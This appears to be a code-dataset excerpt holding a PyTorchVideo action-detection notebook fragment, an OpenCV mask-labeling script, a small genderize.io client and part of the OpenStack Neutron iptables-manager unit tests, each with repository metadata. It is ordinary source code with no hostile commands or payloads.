# Here, below we define a method that can pre-process the clip and bounding boxes. It generates inputs accordingly for both Slow (Resnet) and SlowFast models depending on the parameterization of the variable `slow_fast_alpha`.
# In[14]:
def ava_inference_transform(
clip,
boxes,
num_frames = 4, #if using slowfast_r50_detection, change this to 32
crop_size = 256,
data_mean = [0.45, 0.45, 0.45],
data_std = [0.225, 0.225, 0.225],
slow_fast_alpha = None, #if using slowfast_r50_detection, change this to 4
):
boxes = np.array(boxes)
ori_boxes = boxes.copy()
# Image [0, 255] -> [0, 1].
clip = uniform_temporal_subsample(clip, num_frames)
clip = clip.float()
clip = clip / 255.0
height, width = clip.shape[2], clip.shape[3]
# The format of boxes is [x1, y1, x2, y2]. The input boxes are in the
# range of [0, width] for x and [0,height] for y
boxes = clip_boxes_to_image(boxes, height, width)
# Resize short side to crop_size. Non-local and STRG uses 256.
clip, boxes = short_side_scale_with_boxes(
clip,
size=crop_size,
boxes=boxes,
)
# Normalize images by mean and std.
clip = normalize(
clip,
np.array(data_mean, dtype=np.float32),
np.array(data_std, dtype=np.float32),
)
boxes = clip_boxes_to_image(
boxes, clip.shape[2], clip.shape[3]
)
# Incase of slowfast, generate both pathways
if slow_fast_alpha is not None:
fast_pathway = clip
# Perform temporal sampling from the fast pathway.
slow_pathway = torch.index_select(
clip,
1,
torch.linspace(
0, clip.shape[1] - 1, clip.shape[1] // slow_fast_alpha
).long(),
)
clip = [slow_pathway, fast_pathway]
return clip, torch.from_numpy(boxes), ori_boxes
# ## Setup
#
# Download the id to label mapping for the AVA V2.2 dataset on which the Torch Hub models were finetuned.
# This will be used to get the category label names from the predicted class ids.
#
# Create a visualizer to visualize and plot the results(labels + bounding boxes).
# In[43]:
get_ipython().system('wget https://dl.fbaipublicfiles.com/pytorchvideo/data/class_names/ava_action_list.pbtxt')
# In[8]:
# Create an id to label name mapping
label_map, allowed_class_ids = AvaLabeledVideoFramePaths.read_label_map('ava_action_list.pbtxt')
# Create a video visualizer that can plot bounding boxes and visualize actions on bboxes.
video_visualizer = VideoVisualizer(81, label_map, top_k=3, mode="thres",thres=0.5)
# ## Load an example video
# We get an opensourced video off the web from WikiMedia.
# In[42]:
get_ipython().system('wget https://dl.fbaipublicfiles.com/pytorchvideo/projects/theatre.webm')
# In[6]:
# Load the video
encoded_vid = pytorchvideo.data.encoded_video.EncodedVideo.from_path('theatre.webm')
print('Completed loading encoded video.')
# ## Generate bounding boxes and action predictions for a 10 second clip in the video.
# In[19]:
# Video predictions are generated at an internal of 1 sec from 90 seconds to 100 seconds in the video.
time_stamp_range = range(90,100) # time stamps in video for which clip is sampled.
clip_duration = 1.0 # Duration of clip used for each inference step.
gif_imgs = []
for time_stamp in time_stamp_range:
print("Generating predictions for time stamp: {} sec".format(time_stamp))
# Generate clip around the designated time stamps
inp_imgs = encoded_vid.get_clip(
time_stamp - clip_duration/2.0, # start second
time_stamp + clip_duration/2.0 # end second
)
inp_imgs = inp_imgs['video']
# Generate people bbox predictions using Detectron2's off the self pre-trained predictor
# We use the the middle image in each clip to generate the bounding boxes.
inp_img = inp_imgs[:,inp_imgs.shape[1]//2,:,:]
inp_img = inp_img.permute(1,2,0)
# Predicted boxes are of the form List[(x_1, y_1, x_2, y_2)]
predicted_boxes = get_person_bboxes(inp_img, predictor)
if len(predicted_boxes) == 0:
print("Skipping clip no frames detected at time stamp: ", time_stamp)
continue
# Preprocess clip and bounding boxes for video action recognition.
inputs, inp_boxes, _ = ava_inference_transform(inp_imgs, predicted_boxes.numpy())
# Prepend data sample id for each bounding box.
# For more details refere to the RoIAlign in Detectron2
inp_boxes = torch.cat([torch.zeros(inp_boxes.shape[0],1), inp_boxes], dim=1)
# Generate actions predictions for the bounding boxes in the clip.
# The model here takes in the pre-processed video clip and the detected bounding boxes.
if isinstance(inputs, list):
inputs = [inp.unsqueeze(0).to(device) for inp in inputs]
else:
inputs = inputs.unsqueeze(0).to(device)
preds = video_model(inputs, inp_boxes.to(device))
preds= preds.to('cpu')
# The model is trained on AVA and AVA labels are 1 indexed so, prepend 0 to convert to 0 index.
preds = torch.cat([torch.zeros(preds.shape[0],1), preds], dim=1)
# Plot predictions on the video and save for later visualization.
inp_imgs = inp_imgs.permute(1,2,3,0)
inp_imgs = inp_imgs/255.0
out_img_pred = video_visualizer.draw_clip_range(inp_imgs, preds, predicted_boxes)
gif_imgs += out_img_pred
print("Finished generating predictions.")
# ## Save predictions as video
# The generated video consists of bounding boxes with predicted actions for each bounding box.
# In[20]:
height, width = gif_imgs[0].shape[0], gif_imgs[0].shape[1]
vide_save_path = 'output_detections.mp4'
video = cv2.VideoWriter(vide_save_path,cv2.VideoWriter_fourcc(*'DIVX'), 7, (width,height))
for image in gif_imgs:
img = (255*image).astype(np.uint8)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
video.write(img)
video.release()
print('Predictions are saved to the video file: ', vide_save_path)
# In[ ]:
| 34.191336
| 226
| 0.729596
|
4a145684e9dc7dc867ab44e4532c8c415b324673
| 6,858
|
py
|
Python
|
data_labeling/generate_semantic_non_circle_label.py
|
chansoopark98/hole-detection
|
76e47057b1e186d4e2f5db2b5b2bb1074b849078
|
[
"MIT"
] | null | null | null |
data_labeling/generate_semantic_non_circle_label.py
|
chansoopark98/hole-detection
|
76e47057b1e186d4e2f5db2b5b2bb1074b849078
|
[
"MIT"
] | null | null | null |
data_labeling/generate_semantic_non_circle_label.py
|
chansoopark98/hole-detection
|
76e47057b1e186d4e2f5db2b5b2bb1074b849078
|
[
"MIT"
] | null | null | null |
import argparse
import os
import tensorflow as tf
import glob
import cv2
import numpy as np
import math
from pathlib import Path
import natsort
import re
file_pattern = re.compile(r'.*?(\d+).*?')
def get_order(file):
match = file_pattern.match(Path(file).name)
if not match:
return math.inf
return int(match.groups()[0])
def onMouse(event, x, y, flags, param):
# event = 10 휠 조절
# event = 3 휠 클릭
filled = 5
if event==cv2.EVENT_LBUTTONDOWN: # 마우스 왼쪽 버튼 클릭
rgb_x = param[2]
rgb_y = param[3]
# param[0][y, x] = (0, 255, 0)
param[1][rgb_y + y, rgb_x + x] = 2
area = param[0][y- param[4] : y + param[4], x - param[4] : x + param[4]]
if np.any(area == (0, 255, 0)):
param[0][y- filled : y + filled, x - filled : x + filled] = (0, 255, 0)
new_v = np.where(abs(area - param[0][y, x]) <=(param[5], param[5] ,param[5]), (0, 255, 0), area)
param[0][y- param[4] : y + param[4], x - param[4] : x + param[4]] = new_v
semantic_v = np.where(new_v == (0, 255, 0), 2, 0)
param[1][(rgb_y + y) - param[4]:(rgb_y + y) + param[4], (rgb_x + x) - param[4] : (rgb_x + x) + param[4]] = semantic_v[:, :, 0]
if event==3: # 휠 클릭
rgb_x = param[2]
rgb_y = param[3]
param[0][y- filled : y + filled, x - filled : x + filled] = 0
param[1][(rgb_y + y) - filled:(rgb_y + y) + filled, (rgb_x + x) - filled : (rgb_x + x) + filled] = 0
cv2.imshow('draw_img',param[0])
cv2.resizeWindow('draw_img', IMAGE_SIZE[1], IMAGE_SIZE[0])
parser = argparse.ArgumentParser()
parser.add_argument("--rgb_path", type=str, help="raw image path", default='./data_labeling/data/img/0321/032110_white_r1_40cm/result/rgb/')
parser.add_argument("--mask_path", type=str, help="raw image path", default='./data_labeling/data/img/0321/032110_white_r1_40cm/result/mask/')
parser.add_argument("--result_path", type=str, help="raw image path", default='./data_labeling/data/img/0321/032110_white_r1_40cm/result/semantic_label')
args = parser.parse_args()
RGB_PATH = args.rgb_path
MASK_PATH = args.mask_path
RESULT_DIR = args.result_path
RESOLUTION = (640,480)
MASK_RESULT_DIR = RESULT_DIR + '_mask_result/'
IMAGE_SIZE = (480, 640)
# IMAGE_SIZE = (None, None)
ROI_PATH = MASK_RESULT_DIR + 'roi_mask/'
ROI_INPUT_PATH = ROI_PATH + 'input/'
ROI_GT_PATH = ROI_PATH + 'gt/'
ROI_CHECK_GT_PATH = ROI_PATH + 'check_gt/'
SEMANTIC_PATH = MASK_RESULT_DIR + 'semantic_mask/'
SEMANTIC_INPUT_PATH = SEMANTIC_PATH + 'input/'
SEMANTIC_GT_PATH = SEMANTIC_PATH + 'gt/'
SEMANTIC_CHECK_GT_PATH = SEMANTIC_PATH + 'check_gt/'
os.makedirs(MASK_RESULT_DIR, exist_ok=True)
os.makedirs(ROI_PATH, exist_ok=True)
os.makedirs(ROI_INPUT_PATH, exist_ok=True)
os.makedirs(ROI_GT_PATH, exist_ok=True)
os.makedirs(SEMANTIC_PATH, exist_ok=True)
os.makedirs(SEMANTIC_INPUT_PATH, exist_ok=True)
os.makedirs(SEMANTIC_GT_PATH, exist_ok=True)
os.makedirs(ROI_CHECK_GT_PATH, exist_ok=True)
os.makedirs(SEMANTIC_CHECK_GT_PATH, exist_ok=True)
rgb_list = glob.glob(os.path.join(RGB_PATH+'*.png'))
rgb_list = natsort.natsorted(rgb_list,reverse=True)
mask_list = glob.glob(os.path.join(MASK_PATH+'*.png'))
mask_list = natsort.natsorted(mask_list,reverse=True)
i = 1
for idx in range(len(rgb_list)):
img = cv2.imread(rgb_list[idx])
gt = cv2.imread(mask_list[idx])
mask = np.where(gt.copy()>= 200, 1.0 , 0)
original = img
result = mask
result= result[:, :, 0].astype(np.uint8)
result_mul = result.copy() * 255
hh, ww = result_mul.shape
contours, _ = cv2.findContours(result_mul, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
circle_contour = []
for contour in contours:
area = cv2.contourArea(contour)
if area >= 1000:
circle_contour.append(contour)
try:
x,y,w,h = cv2.boundingRect(circle_contour[0])
except:
continue
center_x = x + (w/2)
center_y = y + (h/2)
rgb_map = original.copy()
rgb_map = cv2.bitwise_and(rgb_map, rgb_map, mask=result)
# >>>> ROI CROP
ROI = rgb_map.copy()[y:y+h, x:x+w]
# ROI = cv2.resize(ROI, dsize=(w * 4, h * 4), interpolation=cv2.INTER_LINEAR)
# ROI = cv2.GaussianBlur(ROI, (3, 3), 0)
# _, ROI = cv2.threshold(ROI,100,255,cv2.THRESH_BINARY)
# _, ROI = cv2.threshold(ROI,200,255,cv2.THRESH_BINARY)
# circles = cv2.HoughCircles(ROI, cv2.HOUGH_GRADIENT, 1, 1,
# param1=127, param2=cv2.imshow('img',param[0]
# if circles is not None:
# cx, cy, radius = circles[0][0]
# contours, _ = cv2.findContours(ROI, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# min_area = 999999
# out_contour = []
# for contour in contours:
# area = cv2.contourArea(contour)
# if min_area >= area:
# min_area = area
# out_contour = [contour]
draw_img = ROI.copy()
# cv2.drawContours(draw_img, out_contour, 0, (127, 127, 127), -1)
draw_result = result.copy()
cv2.namedWindow("draw_img")
cv2.moveWindow("draw_img", 800, 400)
cv2.createTrackbar("kernel_size", "draw_img", 1, 30, lambda x : x)
cv2.setTrackbarPos("kernel_size", "draw_img", 13)
cv2.createTrackbar("threshold", "draw_img", 1, 255, lambda x : x)
cv2.setTrackbarPos("threshold", "draw_img", 5)
while cv2.waitKey(1) != ord('q'):
kernel_size = cv2.getTrackbarPos("kernel_size", "draw_img")
pixel_threshold = cv2.getTrackbarPos("threshold", "draw_img")
cv2.imshow('draw_img', draw_img)
cv2.setMouseCallback('draw_img', onMouse,[draw_img, draw_result ,x, y, kernel_size, pixel_threshold])
# cv2.waitKey(0)
cv2.destroyAllWindows()
result = np.where(draw_result == 2, 2, result)
cv2.namedWindow("result")
cv2.moveWindow("result", 800, 400)
cv2.imshow('result', result.copy() * 127)
cv2.waitKey(0)
key = cv2.waitKey(0)
cv2.destroyAllWindows()
delete_idx = abs(48 - key)
# Choose don't save
if delete_idx == 65:
continue
# Choose save
# 1번 키를 누를 때
if key == 49:
print('save')
cv2.imwrite(ROI_INPUT_PATH +str(i) +'_rgb.png', original[y:y+h, x:x+w])
cv2.imwrite(ROI_GT_PATH +str(i) +'_semantic_mask.png', result[y:y+h, x:x+w])
cv2.imwrite(ROI_CHECK_GT_PATH +str(i) +'_semantic_mask.png', result[y:y+h, x:x+w] * 127)
cv2.imwrite(SEMANTIC_INPUT_PATH +str(i) +'_rgb.png', original)
cv2.imwrite(SEMANTIC_GT_PATH +str(i) +'_semantic_mask.png', result)
cv2.imwrite(SEMANTIC_CHECK_GT_PATH +str(i) +'_semantic_mask.png', result* 127)
i += 1
| 31.315068
| 159
| 0.618985
|
4a1457180213e69c159e5e5a8f45930341d516c7
| 2,405
|
py
|
Python
|
gender.py
|
sillyfellow/gender.py
|
77f8c57fa7d9847c872867b6d384995616bdbdd1
|
[
"MIT"
] | 1
|
2015-04-09T21:25:12.000Z
|
2015-04-09T21:25:12.000Z
|
gender.py
|
sillyfellow/gender.py
|
77f8c57fa7d9847c872867b6d384995616bdbdd1
|
[
"MIT"
] | null | null | null |
gender.py
|
sillyfellow/gender.py
|
77f8c57fa7d9847c872867b6d384995616bdbdd1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import requests
import json
import sys
import shelve
def fill_gender_db(names, db):
""" call the genderize.io api and then fill in the details
to a local db, a shelf """
url = ""
cnt = 0
for name in names:
if url == "":
url = "name[0]=" + name
else:
url = url + "&name[" + str(cnt) + "]=" + name
cnt += 1
req = requests.get("http://api.genderize.io?" + url)
parse_json_to_db(json.loads(req.text), db)
def parse_json_to_db(data, db):
for item in data:
parse_json_item_to_db(item, db)
def parse_json_item_to_db(item, db):
""" shelves cannot have unicode keys, so keep the latinized version """
name = item["name"]
values = []
if item["gender"] is not None:
values = [name, item["gender"],
float(item["probability"]), int(item["count"])]
else:
values = [name, u'None', u'0.0', 0.0]
db[name.encode('latin_1')] = values
def chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i + n]
def create_gender_db(names_file, database="names_gender.db", chunk_size=20):
"""
read names from the file, call the api, fill the db (shelf)
"""
fd = open(names_file, "r")
db = shelve.open(database)
# If the name is already in the db, then don't check for it
names = [name.strip() for name in fd.readlines()
if name.strip().encode('latin_1') not in db]
for name_chunk in chunks(names, chunk_size):
fill_gender_db(name_chunk, db)
fd.close()
db.close()
def salute(gender):
if gender == u'female':
return u'Frau '
return u'Herr '
def read_gender_db(database="names_gender.db"):
"""
read the database (only the values)
sort them based on the probability of being correct
and print them out with the salutation
"""
db = shelve.open(database)
result = []
for value in db.itervalues():
result.append(value)
result = sorted(result, key=lambda x: x[2], reverse=True)
output = [salute(x[1]) + x[0] + ', ' + unicode(x[2])
for x in result]
for person in output:
print person
db.close()
if __name__ == '__main__':
args = sys.argv
if len(args) == 2:
create_gender_db(args[1])
read_gender_db()
else:
print "Usage: ", args[0], " <file-with-names>"
| 25.052083
| 76
| 0.585447
|
4a1457c07b7bb10db7002886c5912ec369e36989
| 42,130
|
py
|
Python
|
neutron/tests/unit/agent/linux/test_iptables_manager.py
|
aristanetworks/neutron
|
84d2638579dc92b8530ccc3e963ce0e80c36461e
|
[
"Apache-2.0"
] | 5
|
2015-10-20T07:56:53.000Z
|
2017-12-31T22:39:15.000Z
|
neutron/tests/unit/agent/linux/test_iptables_manager.py
|
aristanetworks/neutron
|
84d2638579dc92b8530ccc3e963ce0e80c36461e
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/agent/linux/test_iptables_manager.py
|
aristanetworks/neutron
|
84d2638579dc92b8530ccc3e963ce0e80c36461e
|
[
"Apache-2.0"
] | 3
|
2015-05-08T22:36:28.000Z
|
2015-10-24T21:25:35.000Z
|
# Copyright 2012 Locaweb.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import mock
from oslo_config import cfg
import testtools
from neutron.agent.linux import iptables_comments as ic
from neutron.agent.linux import iptables_manager
from neutron.common import exceptions as n_exc
from neutron.tests import base
from neutron.tests import tools
IPTABLES_ARG = {'bn': iptables_manager.binary_name,
'snat_out_comment': ic.SNAT_OUT,
'filter_rules': ''}
NAT_TEMPLATE = ('# Generated by iptables_manager\n'
'*nat\n'
':neutron-postrouting-bottom - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-float-snat - [0:0]\n'
':%(bn)s-snat - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A POSTROUTING -j neutron-postrouting-bottom\n'
'[0:0] -A neutron-postrouting-bottom -j %(bn)s-snat\n'
'[0:0] -A %(bn)s-snat -j '
'%(bn)s-float-snat\n'
'COMMIT\n'
'# Completed by iptables_manager\n')
NAT_DUMP = NAT_TEMPLATE % IPTABLES_ARG
FILTER_TEMPLATE = ('# Generated by iptables_manager\n'
'*filter\n'
':neutron-filter-top - [0:0]\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-local - [0:0]\n'
'[0:0] -A FORWARD -j neutron-filter-top\n'
'[0:0] -A OUTPUT -j neutron-filter-top\n'
'[0:0] -A neutron-filter-top -j %(bn)s-local\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'COMMIT\n'
'# Completed by iptables_manager\n')
FILTER_DUMP = FILTER_TEMPLATE % IPTABLES_ARG
FILTER_WITH_RULES_TEMPLATE = (
'# Generated by iptables_manager\n'
'*filter\n'
':neutron-filter-top - [0:0]\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-filter - [0:0]\n'
':%(bn)s-local - [0:0]\n'
'[0:0] -A FORWARD -j neutron-filter-top\n'
'[0:0] -A OUTPUT -j neutron-filter-top\n'
'[0:0] -A neutron-filter-top -j %(bn)s-local\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'%(filter_rules)s'
'COMMIT\n'
'# Completed by iptables_manager\n')
COMMENTED_NAT_DUMP = (
'# Generated by iptables_manager\n'
'*nat\n'
':neutron-postrouting-bottom - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-float-snat - [0:0]\n'
':%(bn)s-snat - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A POSTROUTING -j neutron-postrouting-bottom\n'
'[0:0] -A neutron-postrouting-bottom -j %(bn)s-snat '
'-m comment --comment "%(snat_out_comment)s"\n'
'[0:0] -A %(bn)s-snat -j '
'%(bn)s-float-snat\n'
'COMMIT\n'
'# Completed by iptables_manager\n' % IPTABLES_ARG)
TRAFFIC_COUNTERS_DUMP = (
'Chain OUTPUT (policy ACCEPT 400 packets, 65901 bytes)\n'
' pkts bytes target prot opt in out source'
' destination \n'
' 400 65901 chain1 all -- * * 0.0.0.0/0'
' 0.0.0.0/0 \n'
' 400 65901 chain2 all -- * * 0.0.0.0/0'
' 0.0.0.0/0 \n')
class IptablesTestCase(base.BaseTestCase):
def test_get_binary_name_in_unittest(self):
# Corresponds to sys.argv content when running python -m unittest class
with mock.patch('sys.argv', ['python -m unittest', 'class']):
binary_name = iptables_manager.get_binary_name()
self.assertEqual('python_-m_unitte', binary_name)
class IptablesCommentsTestCase(base.BaseTestCase):
def setUp(self):
super(IptablesCommentsTestCase, self).setUp()
cfg.CONF.set_override('comment_iptables_rules', True, 'AGENT')
self.iptables = iptables_manager.IptablesManager()
self.execute = mock.patch.object(self.iptables, "execute").start()
def test_comments_short_enough(self):
for attr in dir(ic):
if not attr.startswith('__') and len(getattr(ic, attr)) > 255:
self.fail("Iptables comment %s is longer than 255 characters."
% attr)
def test_add_filter_rule(self):
iptables_args = {}
iptables_args.update(IPTABLES_ARG)
filter_rules = ('[0:0] -A %(bn)s-filter -j DROP\n'
'[0:0] -A %(bn)s-INPUT -s 0/0 -d 192.168.0.2 -j '
'%(bn)s-filter\n' % iptables_args)
iptables_args['filter_rules'] = filter_rules
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % iptables_args
raw_dump = _generate_raw_dump(IPTABLES_ARG)
mangle_dump = _generate_mangle_dump(IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + COMMENTED_NAT_DUMP +
mangle_dump + filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + COMMENTED_NAT_DUMP +
mangle_dump + FILTER_DUMP),
run_as_root=True
),
None),
]
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.ipv4['filter'].add_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].add_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter' % IPTABLES_ARG)
self.iptables.apply()
self.iptables.ipv4['filter'].remove_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].remove_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter'
% IPTABLES_ARG)
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def _generate_mangle_dump(iptables_args):
return ('# Generated by iptables_manager\n'
'*mangle\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-mark - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A %(bn)s-PREROUTING -j %(bn)s-mark\n'
'COMMIT\n'
'# Completed by iptables_manager\n' % iptables_args)
def _generate_raw_dump(iptables_args):
return ('# Generated by iptables_manager\n'
'*raw\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'COMMIT\n'
'# Completed by iptables_manager\n' % iptables_args)
MANGLE_DUMP = _generate_mangle_dump(IPTABLES_ARG)
RAW_DUMP = _generate_raw_dump(IPTABLES_ARG)
class IptablesManagerStateFulTestCase(base.BaseTestCase):
def setUp(self):
super(IptablesManagerStateFulTestCase, self).setUp()
cfg.CONF.set_override('comment_iptables_rules', False, 'AGENT')
self.iptables = iptables_manager.IptablesManager()
self.execute = mock.patch.object(self.iptables, "execute").start()
def test_binary_name(self):
expected = os.path.basename(sys.argv[0])[:16]
self.assertEqual(expected, iptables_manager.binary_name)
def test_get_chain_name(self):
name = '0123456789' * 5
# 28 chars is the maximum length of iptables chain name.
self.assertEqual(iptables_manager.get_chain_name(name, wrap=False),
name[:28])
# 11 chars is the maximum length of chain name of iptable_manager
# if binary_name is prepended.
self.assertEqual(iptables_manager.get_chain_name(name, wrap=True),
name[:11])
def test_defer_apply_with_exception(self):
self.iptables._apply = mock.Mock(side_effect=Exception)
with testtools.ExpectedException(n_exc.IpTablesApplyException):
with self.iptables.defer_apply():
pass
def _extend_with_ip6tables_filter(self, expected_calls, filter_dump):
expected_calls.insert(2, (
mock.call(['ip6tables-save', '-c'],
run_as_root=True),
''))
expected_calls.insert(3, (
mock.call(['ip6tables-restore', '-c'],
process_input=filter_dump,
run_as_root=True),
None))
expected_calls.extend([
(mock.call(['ip6tables-save', '-c'],
run_as_root=True),
''),
(mock.call(['ip6tables-restore', '-c'],
process_input=filter_dump,
run_as_root=True),
None)])
def _test_add_and_remove_chain_custom_binary_name_helper(self, use_ipv6):
bn = ("abcdef" * 5)
self.iptables = iptables_manager.IptablesManager(
binary_name=bn,
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
iptables_args = {'bn': bn[:16], 'filter_rules': ''}
filter_dump = FILTER_WITH_RULES_TEMPLATE % iptables_args
filter_dump_ipv6 = FILTER_TEMPLATE % iptables_args
filter_dump_mod = filter_dump
nat_dump = NAT_TEMPLATE % iptables_args
raw_dump = _generate_raw_dump(iptables_args)
mangle_dump = _generate_mangle_dump(iptables_args)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
filter_dump_ipv6)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.apply()
self.iptables.ipv4['filter'].empty_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_and_remove_chain_custom_binary_name(self):
self._test_add_and_remove_chain_custom_binary_name_helper(False)
def test_add_and_remove_chain_custom_binary_name_with_ipv6(self):
self._test_add_and_remove_chain_custom_binary_name_helper(True)
def _test_empty_chain_custom_binary_name_helper(self, use_ipv6):
bn = ("abcdef" * 5)[:16]
self.iptables = iptables_manager.IptablesManager(
binary_name=bn,
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
iptables_args = {'bn': bn}
filter_dump = FILTER_TEMPLATE % iptables_args
filter_rules = ('[0:0] -A %(bn)s-filter -s 0/0 -d 192.168.0.2\n'
% iptables_args)
iptables_args['filter_rules'] = filter_rules
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % iptables_args
nat_dump = NAT_TEMPLATE % iptables_args
raw_dump = _generate_raw_dump(iptables_args)
mangle_dump = _generate_mangle_dump(iptables_args)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
filter_dump)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.ipv4['filter'].add_rule('filter',
'-s 0/0 -d 192.168.0.2')
self.iptables.apply()
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_empty_chain_custom_binary_name(self):
self._test_empty_chain_custom_binary_name_helper(False)
def test_empty_chain_custom_binary_name_with_ipv6(self):
self._test_empty_chain_custom_binary_name_helper(True)
def _test_add_and_remove_chain_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % IPTABLES_ARG
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.apply()
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_and_remove_chain(self):
self._test_add_and_remove_chain_helper(False)
def test_add_and_remove_chain_with_ipv6(self):
self._test_add_and_remove_chain_helper(True)
def _test_add_filter_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
iptables_args = {}
iptables_args.update(IPTABLES_ARG)
filter_rules = ('[0:0] -A %(bn)s-filter -j DROP\n'
'[0:0] -A %(bn)s-INPUT -s 0/0 -d 192.168.0.2 -j '
'%(bn)s-filter\n' % iptables_args)
iptables_args['filter_rules'] = filter_rules
